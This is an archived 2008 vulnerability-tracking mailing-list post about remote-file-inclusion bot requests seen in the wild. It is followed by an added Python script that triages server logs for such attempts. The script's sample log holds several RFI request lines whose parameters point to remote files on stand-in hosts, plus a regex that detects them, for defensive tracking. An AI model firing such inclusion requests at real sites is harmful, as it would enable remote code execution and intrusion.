[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 18:12:32 UTC 2008
: If you're bored I have a few rfi's for you to go through :)
:
: # wc -l todays-rfi-bots.txt
:
: 44737 todays-rfi-bots.txt
:
: The file will show the number of uniq entries that have hit milw0rm in
: the past 24 hours requesting http inclusions. People forget to remove
: milw0rm from their rfi scans.

Hah, this is what I was thinking of doing but automating it more to pull
them out nightly. If time permitted, I was going to get fancy and have it
weed out known vulnerabilities. If not, I wonder if there are a few folks
that could check them if we mail them here with a little research already
done.

Obviously we all want to track vulnerabilities in our respective
databases, but these are of specific interest for several reasons.
Primarily, they are being actively exploited in the wild and would qualify
for 'undercover vulnerabilities' [1].

I'm also curious if these suffer from the 'grep and gripe' false positives
that we see on the mail lists, and if the botnet is essentially trying to
do inclusions on scripts that aren't really vulnerable in the first place.

.b
[1] http://osvdb.org/blog/?p=227
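
An added example, not part of the original message or of any poster's tooling: one way the nightly pull described above could be run over a web server access log, reducing remote-inclusion requests to unique (script, parameter) pairs and dropping pairs already catalogued. The log lines, the KNOWN list and the function names are constructed for illustration, and keying on the script's base name is an assumption.

```python
import posixpath
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = '''\
192.0.2.10 - - [20/Mar/2008:03:11:02 +0000] "GET /index.php?page=http://example.org/x.txt? HTTP/1.1" 404 512 "-" "-"
192.0.2.11 - - [20/Mar/2008:03:11:09 +0000] "GET /forum/index.php?page=http%3A%2F%2Fexample.org%2Fx.txt%3F HTTP/1.1" 404 512 "-" "-"
198.51.100.7 - - [20/Mar/2008:03:12:40 +0000] "GET /shop/view.php?inc=ftp://example.net/y.txt HTTP/1.0" 404 512 "-" "-"
198.51.100.7 - - [20/Mar/2008:03:12:41 +0000] "GET /gallery/admin.php?cfg[root]=http://example.org/x.txt? HTTP/1.0" 404 512 "-" "-"
203.0.113.5 - - [20/Mar/2008:03:13:00 +0000] "GET /index.php?ref=local&id=4 HTTP/1.1" 200 2048 "-" "-"
203.0.113.9 - - [20/Mar/2008:03:13:05 +0000] "GET /search.php?q=how+to+use+http://example.org HTTP/1.1" 200 2048 "-" "-"
'''.splitlines()

# Hypothetical "already catalogued" list, keyed by (script name, parameter).
KNOWN = {("index.php", "page")}

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def rfi_attempts(lines):
    """Yield (script, parameter) for each parameter whose value is a remote URL."""
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE.match(value.strip()):
                # Install directories vary per site; key on the script name.
                yield posixpath.basename(path), name


def triage(lines, known=KNOWN):
    """Count attempts per (script, parameter), dropping known entries."""
    hits = Counter(rfi_attempts(lines))
    return Counter({k: n for k, n in hits.items() if k not in known})


if __name__ == "__main__":
    for (script, param), count in triage(SAMPLE_LOG).most_common():
        print(f"{count:5d}  {script}  {param}")
```

The pairs that survive triage are only candidates: a request in the log shows that a bot tried the parameter, not that the script actually includes it.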